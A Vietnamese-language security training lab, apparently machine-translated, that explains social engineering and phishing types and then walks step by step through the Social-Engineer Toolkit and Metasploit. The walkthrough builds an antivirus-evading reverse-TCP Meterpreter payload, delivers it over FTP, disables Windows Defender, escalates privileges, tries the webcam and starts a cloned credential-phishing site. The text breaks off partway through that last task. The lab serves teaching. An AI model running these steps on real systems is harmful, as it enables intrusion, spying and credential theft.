Bài tập 1- Các loại và kỹ thuật xã hội Social Engineering
Kỹ thuật xã hội hay Social Engineering là nghệ thuật điều khiển và sử dụng hành vi của con người để thực hiện một vi phạm an ninh. Trong kỹ thuật xã hội, nạn nhân không nhận ra rằng họ đang được sử dụng. Người dùng được coi là mắt xích yếu nhất trong chuỗi bảo mật và rất dễ bị khai thác. Kẻ tấn công có thể sử dụng các phương pháp khác nhau trong kỹ thuật xã hội để lấy thông tin nhạy cảm và bí mật gây ra vi phạm bảo mật. Kẻ tấn công có thể sử dụng các phương pháp như gửi E-mail hoặc chuyển hướng người dùng đến một trang web độc hại.
Trong kỹ thuật xã hội, kẻ tấn công thao túng nạn nhân về mặt tâm lý và điều chỉnh sai để họ có được thông tin mong muốn.

Kỹ thuật xã hội có thể được thực hiện theo nhiều cách khác nhau. Ví dụ:
- Qua điện thoại
- Mặt đối mặt
- Thực hiện một tác vụ trên hệ thống
Kỹ thuật xã hội có thể được coi là cơ sở cho hầu hết các dạng kỹ thuật thu thập thông tin thụ động. Kết quả của kỹ thuật xã hội có thể tàn phá. Với một người dùng là mục tiêu trong một tổ chức, kẻ tấn công có thể thực hiện vi phạm bảo mật của toàn bộ mạng. Nó chỉ là một vấn đề của việc vào bên trong mạng bằng cách sử dụng thông tin được cung cấp bởi người dùng.
Có thể có nhiều kiểu người dùng khác nhau có thể là mục tiêu của kỹ nghệ xã hội. Một số mục tiêu phổ biến là:
- Lễ tân
- bàn hướng dẫn công nghệ thông tin
- Phòng nhân sự
- Quản lý hàng đầu
Trong bài tập này, bạn sẽ học về kỹ thuật xã hội.
Kết quả học tập
Sau khi hoàn thành bài tập này, bạn sẽ có thể:
- Biết các thành phần cơ bản của kỹ thuật xã hội
- Biết các kỹ thuật tạo động lực
- Biết lừa đảo và các loại lừa đảo
- Biết chơi khăm, lừa bịp, lướt sóng bằng vai, theo dõi
Nhiệm vụ 1 – Biết các thành phần cơ bản của Kỹ thuật xã hội
Kỹ thuật xã hội là một phương pháp trích xuất thông tin có giá trị từ một người để hỗ trợ trong một cuộc tấn công. Kẻ tấn công có thể sử dụng một trong ba thành phần của kỹ thuật xã hội:
- Sự khám phá
- Thẩm vấn
- Pretexting
Sự khám phá
Khi sử dụng kích thích, kẻ tấn công trích xuất thông tin từ nạn nhân mà không đặt câu hỏi trực tiếp. Thay vào đó, kẻ tấn công hỏi những câu hỏi mở và sau đó tiếp tục thu hẹp chúng đến mức nạn nhân tiết lộ thông tin. Trong quá trình này, nạn nhân không nhận ra rằng họ đang cung cấp thông tin có giá trị cho kẻ tấn công.
Thẩm vấn
Kẻ tấn công thẩm vấn nạn nhân để khai thác thông tin có giá trị. Tuy nhiên, kẻ tấn công cần tỉnh táo đặt quá nhiều câu hỏi, để nạn nhân không nghi ngờ chúng.
Kẻ tấn công, ngoài việc đặt câu hỏi, còn có thể quan sát nạn nhân. Ví dụ, kẻ tấn công có thể chú ý đến những điều sau:
- Ngôn ngữ cơ thể
- Cử chỉ cơ thể – chuyển động của bàn tay và bàn chân
- Nét mặt
Pretexting
Pretexting là việc đưa ra các lý do giả tạo cho các hành động nhằm thu được thông tin. Ví dụ, kẻ tấn công che giấu danh tính thực của họ và nói dối về mục đích của thông tin mà họ yêu cầu. Mục đích của cuộc trò chuyện là bịa đặt để có được quyền truy cập thông tin cá nhân.
Pretexting có thể được thực hiện thông qua các phương pháp khác nhau, chẳng hạn như:
- Điện thoại
- Tin khẩn
Bất kỳ ai cũng có thể trở thành mục tiêu của pretexting. Nó thường được sử dụng nhất bởi:
- Gián điệp của công ty
- Điều tra viên tư nhân
- Nhân viên thực thi pháp luật
Nhiệm vụ 2 – Biết các kỹ thuật tạo động lực
Kẻ tấn công, khi sử dụng kỹ thuật xã hội, phải sử dụng một phương pháp hoặc kỹ thuật để có được thông tin mong muốn. Có nhiều kỹ thuật khác nhau có thể được sử dụng bởi kẻ tấn công. Một số kỹ thuật thường được sử dụng là:
- Quyền hạn: Kẻ tấn công thể hiện quyền hạn bằng cách giả vờ đến từ một tổ chức chẳng hạn như cơ quan thực thi pháp luật. Kẻ tấn công thể hiện sự tự tin khi giả vờ là người có thẩm quyền và gây áp lực buộc nạn nhân phải cung cấp thông tin. Ví dụ, kẻ tấn công có thể gọi cho lễ tân và nói với lễ tân rằng hắn đang gọi từ sở cảnh sát và cần một số thông tin nhất định.
- Tính khẩn cấp: Với kỹ thuật này, cảm giác khẩn cấp được tạo ra, buộc nạn nhân phải đưa ra quyết định nhanh chóng mà không cần suy nghĩ nhiều. Ví dụ, kẻ tấn công có thể gọi cho nạn nhân để chia sẻ và đặt lại mật khẩu ngay lập tức, hoặc tài khoản của anh ta sẽ bị chấm dứt.
- Bằng chứng xã hội: Bằng chứng xã hội thường được sử dụng khi nạn nhân ở trong tình huống mà họ không biết phải xử lý như thế nào. Do nạn nhân không biết phải làm gì, họ đưa ra quyết định bằng cách quan sát những người khác. Có một số cách mà kẻ tấn công có thể áp dụng kỹ thuật này để tận dụng tình huống bằng cách thể hiện một hành động thuyết phục nạn nhân rằng đây là hành vi đúng.
- Sợ hãi: Kẻ tấn công sử dụng nỗi sợ hãi để khiến nạn nhân làm theo ý họ. Kẻ tấn công tạo ra một tình huống mà nạn nhân buộc phải hành động nhanh chóng để tránh một kết cục nguy hiểm.
Nhiệm vụ 3 – Biết Lừa đảo và các loại của nó
Lừa đảo là một cuộc tấn công kỹ thuật xã hội sử dụng phương pháp đánh lừa kỹ thuật để thuyết phục người dùng cung cấp thông tin cá nhân, chẳng hạn như mật khẩu, số an sinh xã hội, số thẻ tín dụng và chi tiết tài khoản ngân hàng. Trong cuộc tấn công lừa đảo, kẻ tấn công có thể tạo một Trang web hoặc Trang web sao chép để lừa người dùng cung cấp thông tin cá nhân. Trang web hoặc các Trang web là những trang web giống hệt như Trang web gốc hoặc các Trang web mà người dùng bị lừa. Các URL gần với bản gốc, mà hầu hết thời gian, người dùng không thèm kiểm tra. Một trong những lý do chính đằng sau lừa đảo là lợi nhuận tài chính.
Ba phương pháp thường được sử dụng trong lừa đảo:
- Gửi thư hàng loạt: Một lượng lớn đối tượng được nhắm mục tiêu. Do số lượng người được nhắm mục tiêu, rất có thể ít nhất một số người sẽ rơi vào cuộc tấn công. Phương pháp này thường được thực hiện bằng cách sử dụng SPAM.
- Nhắn tin nhanh: Trong những năm gần đây, nhắn tin nhanh đã trở thành một phương thức lừa đảo phổ biến hơn. Các URL độc hại được gửi với các thông điệp hấp dẫn để thu hút người dùng nhấp vào chúng.
- Trang web độc hại: Lừa đảo cũng có thể được thực hiện thông qua các Trang web độc hại. Đôi khi chúng rất giống với các trang web hợp pháp.
Lừa đảo là một quá trình gồm bốn giai đoạn. Các giai đoạn này như sau:
- Khởi xướng: Kẻ tấn công chuẩn bị.
- Thực thi: Kẻ tấn công gửi thư hàng loạt hoặc tin nhắn tức thì cho hàng trăm hoặc hàng nghìn người dùng.
- Hành động của người dùng : Người dùng thực hiện hai tác vụ. Đầu tiên, họ nhấp vào URL và sau đó nhập thông tin cá nhân trên Trang web.
- Hoàn thành: Thông tin người dùng nhập vào sẽ được kẻ tấn công tiếp nhận và lưu lại. Bây giờ kẻ tấn công sử dụng thông tin này.
Đến cuối giai đoạn thứ tư, cuộc tấn công lừa đảo đã hoàn tất thành công. Trong một cuộc tấn công lừa đảo, kẻ tấn công có thể sử dụng nhiều phương pháp tấn công khác nhau. Một số phương pháp tấn công này là:
- Man-In-The-Middle
- Đánh cắp phiên
- Lừa đảo qua Công cụ Tìm kiếm
- Thao tác liên kết
- Các cuộc tấn công làm xáo trộn URL
- Các lỗ hổng phía khách hàng
- Viết kịch bản trên nhiều trang web
- Phần mềm độc hại / Keylogger / Trình ghi màn hình / Trojan
- E-mail (Lừa đảo lừa đảo)
- Đầu độc tệp máy chủ
- Lừa đảo dựa trên DNS
- Nội dung-Tiêm
Lý do cho các cuộc tấn công lừa đảo thành công
Có nhiều lý do khác nhau để một cuộc tấn công lừa đảo trở nên thành công. Một số lý do phổ biến là:
- Thiếu kiến thức: Người dùng không được đào tạo đủ hoặc hoàn toàn không nhận thức được sự nguy hiểm của các cuộc tấn công lừa đảo. Những kẻ tấn công sử dụng phương pháp này với hàng trăm hoặc hàng nghìn người dùng cùng một lúc và một số người dùng trở thành con mồi của cuộc tấn công.
- Đánh lừa thị giác: Những kẻ tấn công sử dụng một URL hoặc tên miền tương tự với bản sao gần như chính xác của Trang web hợp pháp. Người dùng bị đánh lừa với bản sao của Trang web và nhập thông tin đăng nhập người dùng của họ mà không nhận ra, sau đó bị kẻ tấn công thu giữ và sử dụng trên Trang web thực.
- Chỉ báo trực quan: Người dùng hầu hết không chú ý đến URL hoặc tên miền và do đó, cuối cùng trở thành nạn nhân của cuộc tấn công lừa đảo.
Các loại tấn công lừa đảo
Mặc dù có một số loại tấn công lừa đảo, nhưng sau đây là ba loại nổi bật:
Spear Phishing
Spear phishing tập trung vào các mục tiêu cụ thể. Không giống như lừa đảo tiêu chuẩn, nó không tập trung vào công chúng. Trong hình thức lừa đảo này, kẻ tấn công cần thời gian để nghiên cứu mục tiêu, những người thường đến từ các tổ chức. Kẻ tấn công sẽ gửi các E-mail được cá nhân hóa thường mang cảm giác cấp bách.
Các E-mail được thiết kế để thu hút mục tiêu nhấp vào URL được cung cấp. Sau khi nhấp vào URL, phần mềm độc hại được tải xuống hoặc thông tin cá nhân và nhạy cảm sẽ bị lộ.
Spear phishing thường được sử dụng với kỹ thuật in sẵn. Kẻ tấn công thu thập thông tin từ các Trang web khác nhau, đặc biệt tập trung vào các trang mạng xã hội.
Săn cá voi
Whaling là một dạng tấn công lừa đảo theo quy trình tương tự như lừa đảo nhưng nhắm vào các giám đốc điều hành cấp cao hoặc các ứng cử viên cấp cao trong một tổ chức, cụ thể là các ứng viên CxO.
Dược phẩm
Trong kiểu tấn công lừa đảo này, khi người dùng nhập đúng URL vào trình duyệt Web, người dùng sẽ được chuyển hướng đến một Trang web giống hệt như chính xác. Người dùng không làm gì sai, nhưng cuộc tấn công vẫn xảy ra. Điều này được thực hiện bằng cách nhiễm độc bộ nhớ cache DNS. Địa chỉ IP thực được ánh xạ tới URL hợp pháp được thay đổi thành địa chỉ IP chuyển hướng người dùng đến một Trang web độc hại, đây là một hình thức chính xác. Người dùng sẽ không thể nghi ngờ bất cứ điều gì ở đây vì URL là chính xác.
Nhiệm vụ 4 – Biết Hoax, Baiting, Lướt sóng vai và Đuôi xe
Các phương pháp sau đây thường được sử dụng trong kỹ thuật xã hội:
Chơi khăm
Một email lừa bịp được gửi đến một số lượng lớn người nhận với mục đích gây hoang mang và báo động. Họ thường rất thuyết phục và có thể khá cực đoan.
Nói chung, một tình huống đáng báo động hoặc khẩn cấp là chủ đề của email. Sau đó, người nhận sẽ được nhắc chuyển tiếp email đến nhiều người hơn.
Ví dụ: một email được gửi thông báo rằng có một đợt bùng phát vi-rút máy tính cụ thể gây ra nhiều thiệt hại và mọi người có thể cần được biết để có thể thực hiện một số biện pháp phòng ngừa hoặc hành động nhất định.
Người gửi ban đầu của trò lừa bịp không có được lợi ích trực tiếp từ việc lưu hành email, nó là để lừa, gây nhầm lẫn và khiến mọi người hoảng sợ.
Lướt sóng vai
Lướt qua vai là một cuộc tấn công kỹ thuật xã hội được thực hiện bằng cách nhìn qua vai của nạn nhân để lấy số thẻ tín dụng, mật khẩu hoặc bất kỳ thông tin thích hợp nào khác. Kẻ tấn công trực tiếp quan sát thông tin nạn nhân nhập vào bằng cách đứng rất gần hoặc phía sau nạn nhân hoặc sử dụng thiết bị hỗ trợ tăng thị lực hoặc ống nhòm để quan sát từ xa. Những kẻ tấn công lướt vai cũng sử dụng kỹ thuật gắn camera kín ẩn sau tường hoặc trần nhà để thu được thông tin nhạy cảm.
Baiting
Baiting là một cuộc tấn công sử dụng đĩa CD, DVD hoặc ổ USB. Nó không sử dụng E-mail làm phương tiện mà dựa vào các thiết bị lưu trữ. Hầu hết, các ổ USB được sử dụng trong trường hợp này. Các ổ USB chứa phần mềm độc hại và được đặt ở những nơi dễ tìm thấy chúng. Ví dụ: một nhân viên văn phòng có thể tìm thấy một ổ USB trong bãi đậu xe của văn phòng của họ với nội dung như “PAYROLL” hoặc “ACCOUNTS” được viết trên đó để lôi kéo người tìm sử dụng nó. Khi công cụ tìm kiếm sử dụng ổ USB trên máy tính xách tay của công ty, phần mềm độc hại sẽ được kích hoạt và lây nhiễm sang máy tính xách tay. Thông qua máy tính xách tay, phần mềm độc hại cuối cùng có thể lây lan vào mạng.
Nối đuôi nhau
Điều chỉnh là một hành vi kỹ thuật xã hội nhằm đạt được quyền truy cập vào một hệ thống bị khóa điện tử hoặc một khu vực hạn chế bằng cách theo dõi người dùng có quyền truy cập hợp pháp, với mục đích truy cập thông tin dễ bị tấn công. Đuôi xe hay còn được gọi là cõng.
Bài tập 2 – Sử dụng Bộ công cụ Kỹ sư xã hội (SET)
Bộ công cụ kỹ sư xã hội (SET) là một bộ công cụ dựa trên Python mã nguồn mở mà bạn có thể sử dụng để thực hiện các cuộc tấn công kỹ thuật xã hội. SET là một phần của Kali Linux. Sử dụng SET, bạn có thể thực hiện các cuộc tấn công khác nhau, chẳng hạn như lừa đảo qua email hoặc các cuộc tấn công dựa trên Web.
Trong bài tập này, bạn sẽ học về cách sử dụng SET.
Kết quả học tập
Sau khi hoàn thành bài tập này, bạn sẽ có thể:
- Tạo một tải trọng độc hại
- Sao chép tệp vào hệ thống của người dùng
- Tải xuống Payload
- Thực thi Tải trọng
- Thu thập bằng chứng thỏa hiệp trên hệ thống của người dùng
- Tiến hành Kỹ thuật xã hội bằng cách sử dụng trang web nhân bản
Thiết bị của bạn
Bạn sẽ sử dụng các thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn thiết bị này.
- PLABDC01 – (Windows Server 2019 – Bộ điều khiển miền)
- PLABWIN10 – (Windows 10 – Thành viên miền)
- PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)

Nhiệm vụ 1 – Tạo một tải trọng độc hại
Để khai thác hệ thống của người dùng, trước tiên bạn cần tạo một payload độc hại, điều này có thể được thực hiện với SET.
Trong tác vụ này, bạn sẽ tạo một tải trọng độc hại.Lưu ý: Khi lần đầu tiên đăng nhập vào thiết bị đầu cuối Kali, bạn có thể gặp lỗi phiên PID. Điều này sẽ không ảnh hưởng đến môi trường làm việc của bạn. Chỉ cần nhấp vào nút X để xóa thông báo và tiếp tục với thực hành phòng thí nghiệm.
Bước 1
Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 .
Đăng nhập bằng các thông tin đăng nhập sau:
Tên tài khoản: nguồn gốc
Mật khẩu: Passw0rd
Màn hình nền Kali được hiển thị.

Bước 2
Trên màn hình nền, từ ngăn bên trái, nhấp vào Thiết bị đầu cuối .Lưu ý: SET cung cấp nhiều công cụ. Trong phòng thí nghiệm này, bạn sẽ tập trung vào các công cụ cụ thể, nhưng trong thời gian rảnh rỗi, bạn có thể thử tất cả các công cụ này để nâng cao khả năng học tập của mình.

Bước 3
Cửa sổ đầu cuối được hiển thị. Nhập lệnh sau:
setoolkit
Nhấn Enter .

Bước 4
Nếu bạn đang sử dụng SET lần đầu tiên, bạn cần chấp nhận các điều khoản dịch vụ. Nhập ký tự sau:
y
Nhấn Enter .

Bước 5
Bây giờ bạn đang ở trên menu chính. Bạn sẽ nhận thấy rằng có nhiều tùy chọn được hiển thị. Mỗi tùy chọn được thiết kế để thực hiện một nhiệm vụ cụ thể. Ví dụ: bạn có thể cập nhật Bộ công cụ kỹ thuật xã hội bằng cách chọn tùy chọn 5 .
Để tiếp tục với tác vụ này, bạn sẽ cần chọn tùy chọn 1) Các cuộc tấn công kỹ thuật xã hội . Nhập số sau:
1
Nhấn Enter .

Bước 6
Tiếp theo, bạn sẽ thấy một menu khác có liên quan đến tùy chọn Social-Engineering Attacks . Trong số các lựa chọn đã cho, bạn có thể chọn 4) Tạo Tải trọng và Trình nghe . Nhập số sau:
4
Nhấn Enter .

Bước 7
Tiếp theo, bạn sẽ được nhắc chọn một tùy chọn. Trong số các lựa chọn đã cho, bạn có thể chọn 5) Windows Meterpreter Reverse_TCP X64 . Nhập số sau:
5
Nhấn Enter .

Bước 8
Bạn sẽ được nhắc cung cấp địa chỉ IP cho trình lắng nghe tải trọng. Đây là địa chỉ IP cho hệ thống của bạn, là thiết bị Kali Linux. Trong môi trường phòng thí nghiệm này, địa chỉ IP cho Kali Linux là 192.168.0.4 .
Đối với địa chỉ IP cho tùy chọn trình nghe tải trọng, hãy nhập địa chỉ IP sau:
192.168.0.4
Nhấn Enter .Lưu ý: Trong môi trường thế giới thực, bạn sẽ có một địa chỉ IP khác. Bạn không nên sử dụng địa chỉ IP này vì nó chỉ áp dụng được trong môi trường phòng thí nghiệm này. Nếu bạn không biết địa chỉ IP của Kali Linux, chỉ cần mở một cửa sổ nhắc lệnh khác và chạy ifconfig. Nếu bạn biết tên bộ điều hợp mạng, thì bạn có thể chạy ifconfig eth0, trong đó eth0 là tên của bộ điều hợp mạng. Bạn sẽ phải kiểm tra hệ thống của mình.

Bước 9
Tiếp theo, bạn sẽ được nhắc nhập số cổng. Nhập số cổng sau vào tùy chọn Nhập CỔNG cho tùy chọn trình nghe ngược :
443
Nhấn Enter .

Bước 10
Lưu ý rằng quá trình thực thi hợp pháp backdooring bắt đầu. Một tệp thực thi hiện đang được đóng gói theo cách mà phần mềm chống vi-rút không thể phát hiện ra nó. Sau khi tệp thực thi được tạo, tệp sẽ được lưu trữ trong /root/.set . Tên mặc định của tệp là payload.exe , bạn sẽ thay đổi tên này sau khi chuyển nó vào hệ thống của nạn nhân.
Bây giờ bạn được nhắc bắt đầu tải trọng và trình nghe. Nhập nội dung sau:
yes
Nhấn Enter .

Bước 11
Khung Metasploit bây giờ bắt đầu. Bây giờ bạn đã sẵn sàng để chuyển sang cấp độ tiếp theo, đó là chia sẻ tải trọng với nạn nhân và sau đó nắm bắt thông tin khi nạn nhân thực hiện tải trọng.
Bây giờ bạn đang ở lời nhắc khai thác msf (trình xử lý) .

Để các thiết bị bạn đã bật nguồn ở trạng thái hiện tại và tiến hành tác vụ tiếp theo.
Nhiệm vụ 2 – Sao chép tệp vào hệ thống của người dùng
Sau khi bạn đã tạo tải trọng, bạn cần chia sẻ nó với nạn nhân. Trong môi trường thực, bạn sẽ có các phương pháp khác nhau để vận chuyển trọng tải này đến hệ thống của nạn nhân. Ví dụ, một số phương thức vận chuyển phổ biến là:
- E-mail: đính kèm trọng tải vào một E-mail và gửi nó cho nạn nhân.
- USB: thêm tải trọng vào USB và khi nạn nhân cắm USB vào hệ thống, nó có thể được kích hoạt.
- Tải xuống: giữ tệp bị nhiễm trong kho tải xuống, nơi nạn nhân tải xuống tải trọng.
- FTP: chia sẻ nó thông qua FTP – làm cho nó giống như một tệp hợp pháp.
Vì đây là môi trường phòng thí nghiệm, bạn có thể mô phỏng quá trình tải xuống tệp từ máy chủ FTP. Trong các tình huống thực tế, người dùng có thể tải xuống các tệp mà họ cho rằng đó là các ứng dụng hợp pháp. Những kẻ tấn công, thường chèn tải trọng vào các tệp mà người dùng tải xuống.
Trong tác vụ này, bạn sẽ thiết lập một máy chủ FTP và chia sẻ tệp với nạn nhân.
Bước 1
Đảm bảo rằng bạn đã đăng nhập vào hệ thống Kali Linux và cũng đảm bảo rằng cửa sổ Metasploit được mở. Lưu ý rằng trình xử lý tải trọng đang ở trạng thái đang chạy.

Bước 2
Tiếp theo, bạn cần thiết lập một máy chủ FTP. Có nhiều lựa chọn. Bạn có thể thiết lập một máy chủ FTP độc lập hoặc sử dụng một máy chủ FTP phụ trợ của Metasploit.
Để thiết lập máy chủ FTP, hãy nhập lệnh sau:
use auxiliary/server/ftp
Nhấn Enter .

Bước 3
Lưu ý rằng dấu nhắc lệnh bây giờ được thay đổi thành phụ trợ msf5 (máy chủ / ftp ). Bạn cần đặt thư mục gốc FTP ngay bây giờ. Để thực hiện việc này, hãy nhập lệnh sau:
set FTPROOT /root/.set/
Nhấn Enter .

Bước 4
Tiếp theo, bạn cần gõ lệnh sau để kích hoạt tải trọng trên hệ thống đích:
exploit
Nhấn Enter .Cảnh báo: Nếu bạn bỏ lỡ bước này, bạn sẽ không thể kết nối với máy chủ FTP. Đây là một bước quan trọng.

Bước 5
Lưu ý rằng lệnh thành công và máy chủ đã khởi động.

Thu nhỏ cửa sổ PLABKALI01 .Lưu ý: Không đóng cửa sổ Metasploit hoặc cửa sổ VNC.Để các thiết bị bạn đã bật nguồn ở trạng thái hiện tại và tiến hành tác vụ tiếp theo.
Nhiệm vụ 3 – Tải xuống Tải xuống
Sau khi bạn đã thiết lập máy chủ FTP, bạn cần tải xuống tệp trên hệ thống của nạn nhân. Bạn không cần một ứng dụng khách FTP để tải xuống tệp. Trong tác vụ này, bạn sẽ sử dụng dấu nhắc lệnh của Windows để kết nối với máy chủ FTP.Lưu ý: Trong môi trường thực, có thể bạn sẽ không phải là người tải xuống tệp trên hệ thống của nạn nhân. Bạn sẽ thuyết phục nạn nhân tải xuống tệp. Để hoàn thành bài tập này, bạn sẽ tải tệp từ máy chủ FTP xuống hệ thống của nạn nhân.
Để tải xuống tải trọng, hãy thực hiện các bước sau:
Bước 1
Đảm bảo rằng bạn đã đăng nhập vào PLABWIN10 .

Bước 2
Nhấp chuột phải vào nút Windows và chọn Run .

Bước 3
Các Run hộp thoại sẽ được hiển thị. Trong hộp văn bản Mở , nhập nội dung sau:
cmd
Nhấn Enter . Ngoài ra, bạn có thể nhấp vào OK .

Bước 4
Cửa sổ nhắc lệnh được hiển thị. Bây giờ bạn sẽ kết nối với máy chủ FTP và tải xuống tệp.
Để kết nối với máy chủ FTP, hãy nhập lệnh sau:
ftp 192.168.0.4
Nhấn Enter .

Bước 5
Bây giờ bạn đã kết nối với máy chủ FTP. Bây giờ bạn sẽ xác thực là người dùng ẩn danh . Nhập tên sau làm Người dùng :
anonymous
Nhấn Enter .

Bước 6
Tiếp theo, bạn được nhắc nhập mật khẩu. Để trống và nhấn Enter .
Bây giờ bạn đã được xác thực thành công với máy chủ FTP.

Bước 7
Bây giờ bạn cần liệt kê các tệp trên máy chủ FTP. Để có thể thực hiện việc này, hãy gõ lệnh sau:
dir
Nhấn Enter .

Bước 8
Lưu ý rằng lệnh đã tạo ra lỗi. Điều này là do hộp thoại Cảnh báo Bảo mật của Windows , đã mở ra.
Giữ cài đặt mặc định và nhấp vào Cho phép truy cập để cho phép ứng dụng vượt qua tường lửa.

Bước 9
Một lần nữa, gõ lệnh sau:
dir
Nhấn Enter . Lưu ý rằng payload.exe có trên máy chủ FTP.

Bước 10
Bây giờ, hãy đặt chuyển thành nhị phân bằng cách gõ lệnh sau:
binary
Nhấn Enter .
Các Loại file tải về được thiết lập để nhị phân.

Bước 11
Tiếp theo, chuyển tệp vào hệ thống của nạn nhân. Nhập lệnh sau:
get payload.exe
Nhấn Enter .
Quá trình chuyển giao thành công.

Bước 12
Bây giờ bạn có thể đóng máy chủ FTP một cách an toàn. Nhập lệnh sau:
quit
Nhấn Enter .

Bước 13
Lưu ý rằng lời nhắc FTP không còn khả dụng. Bạn đã quay lại dấu nhắc lệnh. Thu nhỏ cửa sổ nhắc lệnh.

Để các thiết bị bạn đã bật nguồn ở trạng thái hiện tại và tiến hành tác vụ tiếp theo.
Nhiệm vụ 4 – Thực thi Tải trọng
Sau khi tạo và sao chép tải trọng vào hệ thống của người dùng, bạn cần kích hoạt tải trọng. Trong một tình huống thực tế, chính người dùng sẽ là người kích hoạt tải trọng. Bây giờ bạn sẽ mô phỏng hành vi tương tự trong tác vụ này và thực thi tải trọng.
Để thực hiện tải trọng, hãy thực hiện các bước sau:
Bước 1
Đảm bảo bạn đã kết nối với PLABWIN10 .
Nhấp vào Bắt đầu và nhập thông tin sau.
Windows Defender
Nhấn Enter.

Bước 2
Trong cửa sổ Bộ bảo vệ Windows , chọn Mở Trung tâm Bảo mật của Bộ bảo vệ Windows .

Bước 3
Trong Trung tâm bảo mật của Bộ bảo vệ Windows, chọn Bảo vệ khỏi mối đe dọa và vi-rút

Bước 4
Trong Bảo vệ khỏi mối đe dọa và vi-rút, hãy chọn Cài đặt bảo vệ khỏi mối đe dọa và vi-rút

Bước 5
Trong cài đặt Bảo vệ khỏi mối đe dọa và vi -rút, hãy tắt Bảo vệ trong thời gian thực

Lưu ý: Để hoạt động khai thác, Windows Defender cần được tắt trong môi trường phòng thí nghiệm. Trong một tình huống thực tế, tải trọng độc hại sẽ được ngụy trang thành một ứng dụng hợp pháp cần được cài đặt, do đó vượt qua được Windows Defender.
Bước 6
Đóng Trung tâm Bảo mật của Bộ bảo vệ Windows .

Bước 7
Mở File Explorer từ thanh tác vụ và điều hướng đến đường dẫn sau:
C:\Users\Administrator.PRACTICELABS
Lưu ý rằng tệp tải trọng hiện có.

Bước 8
Di chuyển tệp vào thư mục Tải xuống bằng cách kéo tệp.

Bước 9
Điều hướng đến thư mục Tải xuống . Lưu ý rằng tải trọng hiện có trong thư mục này.

Bước 10
Bây giờ đổi tên tệp để thiết lập .Lưu ý: Bạn có thể đổi tên tệp bằng cách chọn nó và nhấn F2 . Trong một số máy tính xách tay, bạn có thể cần nhấn Fn + F2 . Ngoài ra, bạn có thể nhấp chuột phải vào tệp và chọn Đổi tên .

Bước 11
Sau đó, bấm đúp vào tệp để thực thi nó.

Đóng cửa sổ File Explorer .
Bước 12
Chuyển trở lại cửa sổ Kali Linux . Lưu ý rằng kết nối với hệ thống của nạn nhân đã được mở.Lưu ý: Để có thể hoàn thành nhóm nhiệm vụ tiếp theo trong bài tập này, bạn cần giữ cửa sổ giao diện điều khiển này mở. KHÔNG tắt hoặc thoát khỏi nó.Cảnh báo: Nếu bạn nhấp đúp nhiều lần vào tệp thiết lập, hơn một phiên dịch vụ đo lường sẽ được mở.

Để các thiết bị bạn đã bật nguồn ở trạng thái hiện tại và tiến hành tác vụ tiếp theo.
Nhiệm vụ 5 – Thu thập bằng chứng thỏa hiệp trên hệ thống của người dùng
Tải trọng hiện đang chạy trên hệ thống của nạn nhân. Bạn cần khai thác hệ thống của nạn nhân ngay bây giờ.
Để khai thác hệ thống của nạn nhân, hãy thực hiện các bước sau:
Bước 1
Đảm bảo rằng bạn đã kết nối với PLABKALI01 . Bạn cần mở phiên với hệ thống của nạn nhân ngay bây giờ.
Nhấn Enter trong thiết bị đầu cuối và nhập lệnh sau:
sessions -i 1
Nhấn Enter .
Phiên này hiện đã được thiết lập thành công.

Bước 2
Lưu ý rằng sự tương tác với hệ thống của nạn nhân hiện đã bắt đầu. Bây giờ bạn hầu như đang kiểm soát hệ thống của nạn nhân. Hãy xem các tiến trình đang chạy trên hệ thống của nạn nhân.
Nhập lệnh sau:
ps
Nhấn Enter .

Bước 3
Lưu ý rằng các tiến trình đang chạy trên hệ thống của nạn nhân hiện đã được hiển thị. Điều quan trọng cần lưu ý là tiến trình đang chạy, setup.exe , là tải trọng mà bạn đã thực thi trên hệ thống của nạn nhân.

Bước 4
Tiếp theo, bạn cần nâng cao đặc quyền. Nhập lệnh sau:
getsystem
Nhấn Enter .
Kết quả cho thấy thành công trong việc leo thang đặc quyền.

Bước 5
Bây giờ chúng ta hãy kiểm tra xem hệ thống của nạn nhân có webcam hay không và chụp ảnh. Để kiểm tra điều này, hãy nhập lệnh sau:
webcam_snap
Nhấn Enter .
Lưu ý đầu ra, trong đó nói rằng hệ thống của nạn nhân không có webcam.

Bước 6
Bây giờ bạn có thể thoát khỏi lời nhắc của công cụ đo lường. Nhập lệnh sau:
exit
Nhấn Enter .

Bước 7
Xóa màn hình bằng cách nhập lệnh sau:
clear
Bạn cũng có thể thoát khỏi lời nhắc khung Metasploit. Nhập lệnh sau:
exit -y
Nhấn Enter .Lưu ý: Bạn có một phiên mở với hệ thống đích. Do đó, lệnh thoát sẽ không hoạt động. Bạn cần sử dụng lệnh nêu trên.

Bước 8
Nhấn Enter một lần nữa.
Bạn đã quay lại dấu nhắc lệnh đã đặt .

Giữ cửa sổ đầu cuối mở.
Nhiệm vụ 6 – Tiến hành Kỹ thuật xã hội bằng cách sử dụng một trang web nhân bản
Trang web sao chép là một Trang web lừa đảo giống với trang web gốc và đánh cắp thông tin đăng nhập của người dùng, đây còn được gọi là Trang web giả mạo. Trong kiểu tấn công này, kẻ tấn công sao chép các Trang web hợp pháp và thiết lập Trang web nhân bản với một URL giống với URL của Trang web hợp pháp. Ví dụ: Trang web giả mạo sẽ là http://www.htomail.com thay vì http://www.hotmail.com , là Trang web hợp pháp. URL của Trang web giả mạo được chia sẻ với những người dùng được nhắm mục tiêu qua E-mail. Khi người dùng nhấp vào URL, người dùng không thể phân biệt được đâu là Trang web giả mạo hay Trang web hợp pháp, trừ khi người dùng chú ý đến URL.
Trong nhiệm vụ này, bạn sẽ thiết lập một Trang web giả mạo hoặc sao chép và nắm bắt thông tin đăng nhập của người dùng.
Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 .
Đảm bảo rằng cửa sổ đầu cuối được hiển thị với lời nhắc đã đặt.

Bước 2
Có nhiều phương pháp khác nhau mà bạn có thể sử dụng để tiến hành một cuộc tấn công kỹ thuật xã hội. Trong bước này, bạn sẽ chọn Vectơ tấn công trang web, cho phép bạn khởi động một cuộc tấn công bằng cách sử dụng Trang web sẽ được tạo bởi SET. Nhập nội dung sau:
2
Nhấn Enter .

Bước 3
